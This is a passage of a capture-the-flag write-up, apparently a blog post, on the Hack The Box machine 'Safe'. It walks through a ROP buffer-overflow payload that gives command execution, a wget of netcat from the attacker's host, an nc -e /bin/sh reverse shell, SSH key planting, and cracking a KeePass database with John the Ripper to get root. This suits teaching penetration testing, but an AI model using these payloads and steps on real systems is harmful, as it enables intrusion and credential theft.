"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x52\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"/bin/sh whoami" + "C"*100'</span> <span class="o">&gt;</span> <span class="n">custom9</span><span class="p">.</span><span class="n">txt</span></code></pre></figure>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Safe# <span class="nb">cat </span>custom9.txt | ./myapp 
 20:47:27 up  6:24,  1 user,  load average: 0.19, 0.19, 0.18

What <span class="k">do </span>you want me to <span class="nb">echo </span>back? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/bin/sh<span class="p">;</span>@
root
sh: 1: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC: not found

What <span class="k">do </span>you want me to <span class="nb">echo </span>back? �G�^
Segmentation fault</code></pre></figure>

<p>With some tweaking I was ready give it a shot with the actual <code>myapp</code> instead of my local variant. With baited breath I pressed enter and hoped for the best.</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'print "A"*112 + "/bin/sh|" + 
"</span><span class="se">\x06\x12\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x52\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"cat /home/user/user.txt;" + "C"*100'</span> <span class="o">&gt;</span> <span class="n">custom13</span><span class="p">.</span><span class="n">txt</span></code></pre></figure>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Safe# <span class="nb">cat </span>custom13.txt | nc 10.10.10.147 1337
 21:20:13 up  2:26,  1 user,  load average: 0.00, 0.01, 0.00
7a29e<span class="k">*********************</span></code></pre></figure>

<p> *Happy dance* while not a shell, I was able to cross user flag off the list. With my moment of joy subsiding, let's see how we can use this.</p>

<p>At this point, I essentially have single-command RCE. There are quite a few different ways I could do this. My initial thought was adding my ssh keys to authorized_keys. For whatever reason I couldn't get it to work with the single command RCE. Up next, I attempted to execute a <code>nc</code> back to my local listener, but it seemed like it (among a lot of other common binaries) was not installed. No worries, let's get a static version of <code>nc</code> and host it on our machine, then point our RCE to <code>wget</code> it.</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'print "A"*112 + "/bin/sh|" + 
"</span><span class="se">\x06\x12\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x52\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"wget -P /home/user http://10.10.15.xxx/nc;" + 
"C"*100'</span> <span class="o">&gt;</span> <span class="n">custom13</span><span class="p">.</span><span class="n">txt</span></code></pre></figure>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell"><span class="nb">cat </span>custom13.txt | nc 10.10.10.147 1337
 21:53:02 up  2:59,  1 user,  load average: 0.00, 0.03, 0.00
<span class="nt">--2019-10-13</span> 21:53:02--  http://10.10.15.xxx/nc
Connecting to 10.10.15.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 959800 <span class="o">(</span>937K<span class="o">)</span>
Saving to: ‘/home/user/nc’

     0K .......... .......... .......... .......... ..........  5% 1.28M 1s
    50K .......... .......... .......... .......... .......... 10% 3.71M 0s
   100K .......... .......... .......... .......... .......... 16% 3.20M 0s
   150K .......... .......... .......... .......... .......... 21% 8.72M 0s
   200K .......... .......... .......... .......... .......... 26% 7.80M 0s
   250K .......... .......... .......... .......... .......... 32% 6.51M 0s
   300K .......... .......... .......... .......... .......... 37% 4.55M 0s
   350K .......... .......... .......... .......... .......... 42% 2.78M 0s
   400K .......... .......... .......... .......... .......... 48% 4.13M 0s
   450K .......... .......... .......... .......... .......... 53% 5.26M 0s
   500K .......... .......... .......... .......... .......... 58% 5.75M 0s
   550K .......... .......... .......... .......... .......... 64% 4.37M 0s
   600K .......... .......... .......... .......... .......... 69% 4.64M 0s
   650K .......... .......... .......... .......... .......... 74% 4.73M 0s
   700K .......... .......... .......... .......... .......... 80% 4.79M 0s
   750K .......... .......... .......... .......... .......... 85% 8.24M 0s
   800K .......... .......... .......... .......... .......... 90% 6.02M 0s
   850K .......... .......... .......... .......... .......... 96% 5.90M 0s
   900K .......... .......... .......... .......              100% 8.67M<span class="o">=</span>0.2s

2019-10-13 21:53:02 <span class="o">(</span>4.31 MB/s<span class="o">)</span> - ‘/home/user/nc’ saved <span class="o">[</span>959800/959800]</code></pre></figure>

<p>I then repeated the command setting it to executable with <code>chmod +x /home/user/nc</code>. With my local listener setup, I format the command to connect back to me.</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'print "A"*112 + "/bin/sh|" + 
"</span><span class="se">\x06\x12\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x6e\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"</span><span class="se">\x52\x11\x40\x00\x00\x00\x00\x00</span><span class="s">" + 
"/home/user/nc -e /bin/sh 10.10.15.xxx 1337;" + 
"C"*100'</span> <span class="o">&gt;</span> <span class="n">custom13</span><span class="p">.</span><span class="n">txt</span></code></pre></figure>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Safe# <span class="nb">cat </span>custom13.txt | nc 10.10.10.147 1337
 21:54:58 up  3:01,  1 user,  load average: 0.00, 0.01, 0.00</code></pre></figure>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/usershell1.PNG" />
</p>

<p>Now that there is a limited shell, let's add the ssh keys and connect back properly.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell"><span class="nb">echo</span> <span class="s2">"ssh-rsa AAAAB3NzaC1yc2EA.....OR1FcXBuOItl root@kali"</span> <span class="o">&gt;</span> authorized_keys</code></pre></figure>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Safe# ssh user@10.10.10.147
Linux safe 4.9.0-9-amd64 <span class="c">#1 SMP Debian 4.9.168-1 (2019-04-12) x86_64</span>

The programs included with the Debian GNU/Linux system are free software<span class="p">;</span>
the exact distribution terms <span class="k">for </span>each program are described <span class="k">in </span>the
individual files <span class="k">in</span> /usr/share/doc/<span class="k">*</span>/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct 13 20:03:13 2019 from 10.10.14.38
user@safe:~<span class="nv">$ </span><span class="nb">pwd</span>
/home/user
user@safe:~<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>user<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>user<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>user<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,25<span class="o">(</span>floppy<span class="o">)</span>,29<span class="o">(</span>audio<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,44<span class="o">(</span>video<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,108<span class="o">(</span>netdev<span class="o">)</span>,112<span class="o">(</span>bluetooth<span class="o">)</span></code></pre></figure>

<p>Bam. Ok what a ride. It's not over yet though, we still have root to conquer.</p>

<h1>Root exploitation</h1>

<p>Unfortunately root was not as exciting as user. I did however still learn a thing or two going through the process. With our proper user shell I take a look around and notice a .kdbx file along with 6 JPG files. Let's move those over to our machine for further analysis.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Safe/roots# scp user@10.10.10.147:/home/user/IMG<span class="k">*</span> <span class="nb">.</span>
IMG_0545.JPG                                  100% 1863KB   5.0MB/s   00:00    
IMG_0546.JPG                                  100% 1872KB   4.3MB/s   00:00    
IMG_0547.JPG                                  100% 2470KB   3.4MB/s   00:00    
IMG_0548.JPG                                  100% 2858KB   3.6MB/s   00:00    
IMG_0552.JPG                                  100% 1099KB   3.4MB/s   00:00    
IMG_0553.JPG                                  100% 1060KB   3.8MB/s   00:00    

root@kali:~/Desktop/HTB/Safe/roots# scp user@10.10.10.147:/home/user/My<span class="k">*</span> <span class="nb">.</span>
MyPasswords.kdbx                              100% 2446   121.7KB/s   00:00    </code></pre></figure>

<p>After a bit of searching around find out that .kdbx is a Keeppass database file. <a href="https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c">This article</a> gave me a bit of background in how to use JTR to crack the database. After going through the full <code>rockyou.txt</code> wordlist it didn't seem like I had this right. A little deeper searching and I found <a href="https://stackoverflow.com/questions/45788336/produce-a-hash-from-keepass-with-keyfile">this article</a> that explained how Keeppass databases can also be locked using a keyfile. Considering we have 6 different JPG files this seems like an interesting angle. Using the various JPGs used <code>keepass2john</code> to generate the hash and pass it along to JTR. After a few attempts - victory!<p>


<figure class="highlight"><pre><code class="language-shell" data-lang="shell">root@kali:~/Desktop/HTB/Safe/roots# keepass2john <span class="nt">-k</span> IMG_0547.JPG MyPasswords.kdbx <span class="o">&gt;</span> jcrack.hash
root@kali:~/Desktop/HTB/Safe/roots# <span class="nb">cat </span>jcrack.hash 
MyPasswords:<span class="nv">$keepass$*</span>2<span class="k">*</span>60000<span class="k">*</span>0<span class="k">*</span>a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07<span class="k">*</span>9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817<span class="k">*</span>36079dc6106afe013411361e5022c4cb<span class="k">*</span>f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858<span class="k">*</span>78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96<span class="k">*</span>1<span class="k">*</span>64<span class="k">*</span>e949722c426b3604b5f2c9c2068c46540a5a2a1c557e66766bab5881f36d93c7

root@kali:~/Desktop/HTB/Safe/roots# john jcrack.hash <span class="nt">--wordlist</span> ~/Desktop/rockyou.txt <span class="nt">--format</span><span class="o">=</span>KeePass
..
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>KeePass <span class="o">[</span>SHA256 AES 32/64 OpenSSL]<span class="o">)</span>
...
bullshit         <span class="o">(</span>MyPasswords<span class="o">)</span>
Session completed</code></pre></figure>


<p>Well that's a password alright. Let's get install <code>kpcli</code> and take a poke at what we can see.</p>


<figure class="highlight"><pre><code class="language-shell" data-lang="shell">kpcli:/&gt; import MyPasswords.kdbx <span class="nb">.</span> IMG_0547.JPG
Please provide the master password: <span class="k">*************************</span>
kpcli:/&gt; <span class="nb">ls</span>
<span class="o">===</span> Groups <span class="o">===</span>
eMail/
Internet/
./</code></pre></figure>


<p>Unfortunately both eMail and Internet were empty. Ok I wonder what else I can do with <code>kpcli</code>.</p>


<figure class="highlight"><pre><code class="language-shell" data-lang="shell">kpcli:/&gt; stats
File:               
Key file: N/A
KeePass file version: 
Encryption <span class="nb">type</span>:      
Encryption rounds:    
Number of <span class="nb">groups</span>:     11
Number of entries:    3
Entries with passwords of length:
  -  1-7: 1
  - 8-11: 1
  -  20+: 1

kpcli:/.&gt; find pass
Searching <span class="k">for</span> <span class="s2">"pass"</span> ...
 - 1 matches found and placed into /_found/
Would you like to show this entry? <span class="o">[</span>y/N] 

 Path: /./MyPasswords/
Title: Root password
Uname: root
 Pass: <span class="k">****************************</span>
  URL: 
Notes: </code></pre></figure>


<p>Oooohhh amazing! Ok so we dumped the "root" password into <code>_found</code>. 


<figure class="highlight"><pre><code class="language-shell" data-lang="shell">kpcli:/.&gt; <span class="nb">cd </span>_found/
kpcli:/_found&gt; <span class="nb">ls</span>
<span class="o">===</span> Entries <span class="o">===</span>
1. Root password                                                          
kpcli:/_found&gt; show <span class="nt">-f</span> 0

 Path: /./MyPasswords/
Title: Root password
Uname: root
 Pass: u3v22<span class="k">*******************</span>
  URL: 
Notes: </code></pre></figure>


<p>Now this wasn't the flag itself, so let's try and pivot to root using the <code>kpcli</code> password as root's password.<p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-safe/root.PNG" />
</p>

<p>And just like that, Safe is in the book.</p>

<p>Thanks folks. Until next time.</p>
</p></p></p></p></p>

        
      </div>

      <div class="post-tail-wrapper text-muted">

        <!-- categories -->
        
        <div class="post-meta mb-3">
          <i class="far fa-folder-open fa-fw mr-1"></i>
          
            <a href='/categories/hack-the-box/'>hack-the-box</a>
        </div>
        

        <!-- tags -->
        
        <div class="post-tags">
          <i class="fa fa-tags fa-fw mr-1"></i>
          
          <a href="/tags/htb/"
            class="post-tag no-text-decoration" >htb</a>
          
          <a href="/tags/buffer-overflow/"
            class="post-tag no-text-decoration" >buffer-overflow</a>
          
          <a href="/tags/rop/"
            class="post-tag no-text-decoration" >rop</a>
          
          <a href="/tags/keeppass/"
            class="post-tag no-text-decoration" >keeppass</a>
          
          <a href="/tags/john-the-ripper/"
            class="post-tag no-text-decoration" >john-the-ripper</a>
          
          </div>
        

        <div class="post-tail-bottom
          d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
          
          <div class="license-wrapper">
            This post is licensed under
            <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a>
            by the author.
          </div>
          

          <!--
 Post sharing snippet

 v2.1
 https://github.com/cotes2020/jekyll-theme-chirpy
 © 2019 Cotes Chung
 Published under the MIT License
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=Hack the Box - Safe - Quantumly Confused&url=https://padraignix.github.io/hack-the-box/2019/10/26/htb-machine-safe/" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=Hack the Box - Safe - Quantumly Confused&u=https://padraignix.github.io/hack-the-box/2019/10/26/htb-machine-safe/" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://telegram.me/share?text=Hack the Box - Safe - Quantumly Confused&url=https://padraignix.github.io/hack-the-box/2019/10/26/htb-machine-safe/" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    
      
        <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://padraignix.github.io/hack-the-box/2019/10/26/htb-machine-safe/" data-toggle="tooltip" data-placement="top"
          title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin">
          <i class="fa-fw fab fa-linkedin"></i>
        </a>
    

    <i class="fa-fw fas fa-link small" onclick="copyLink()"
        data-toggle="tooltip" data-placement="top" title="Copy link"></i>

  </span>
</div>


        </div><!-- .post-tail-bottom -->

      </div><!-- div.post-tail -->

    </div> <!-- .post -->


  </div> <!-- #post-wrapper -->

  <!--
  The Pannel on right side (Desktop views)
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

  <div class="access">

  <!---->

    <!--












-->

    <!---->

    <div id="access-lastmod" class="post">
      <span>Recent Articles</span>
      <ul class="post-content pl-0 pb-1 ml-1 mt-2">

      
          <li>
            <a href="/quantum-computing/2022/05/29/ibm-quantum-challenge-spring2022/">Qiskit Quantum Challenge - Spring 2022</a>
          </li>
      
          <li>
            <a href="/ctf/2022/05/28/nsec2022-safecracking/">NSEC 2022 - Safe Cracking</a>
          </li>
      
          <li>
            <a href="/ctf/2022/05/22/nsec2022-n64/">NSEC 2022 - N64 - ROM Reverse Engineering</a>
          </li>
      
          <li>
            <a href="/quantum-computing/2022/05/08/qiskit-first-contribution/">Open Source Quantum Computing - First Qiskit Contribution</a>
          </li>
      
          <li>
            <a href="/quantum-computing/2022/04/30/ibm-quantum-challenge-fall2021/">Qiskit Quantum Challenge - Fall 2021</a>
          </li>
      
<!-- Here is where we change logic to not be off of git commits as it's messy and unnecessary 
      
        
        
        

        

      
        
        
        

        

      
        
        
        

        

      
        
        
        

        

      
        
        
        

        

      
-->
      </ul>
    </div><!-- #access-lastmod -->

    <!---->

  <!----> <!-- site.data.updates -->

  















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  
    <div id="access-tags">
      <span>Trending Tags</span>
      <div class="d-flex flex-wrap mt-3 mb-1 mr-3">
      
      
        
        <a class="post-tag" href="/tags/htb/">htb</a>
      
        
        <a class="post-tag" href="/tags/ctf/">ctf</a>
      
        
        <a class="post-tag" href="/tags/quantum-computing/">quantum computing</a>
      
        
        <a class="post-tag" href="/tags/qiskit/">qiskit</a>
      
        
        <a class="post-tag" href="/tags/quantum-challenge/">quantum challenge</a>
      
        
        <a class="post-tag" href="/tags/ghidra/">ghidra</a>
      
        
        <a class="post-tag" href="/tags/reverse-engineering/">reverse engineering</a>
      
        
        <a class="post-tag" href="/tags/buffer-overflow/">buffer overflow</a>
      
        
        <a class="post-tag" href="/tags/nsec2021/">nsec2021</a>
      
        
        <a class="post-tag" href="/tags/john-the-ripper/">john the ripper</a>
      

      </div>
    </div>
  
  </div> <!-- .access -->
  
  
  <div id="toc-wrapper" class="pl-0 pr-4 mb-5">
    <span class="pl-3 pt-2 mb-2">Contents</span>
    <nav id="toc" data-toggle="toc"></nav>
  </div>
  

</div> <!-- #panel-wrapper -->


</div> <!-- .row -->

<div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

    <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.

 v2.0
 https://github.com/cotes2020/jekyll-theme-chirpy
 © 2019 Cotes Chung
 Published under the MIT License
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


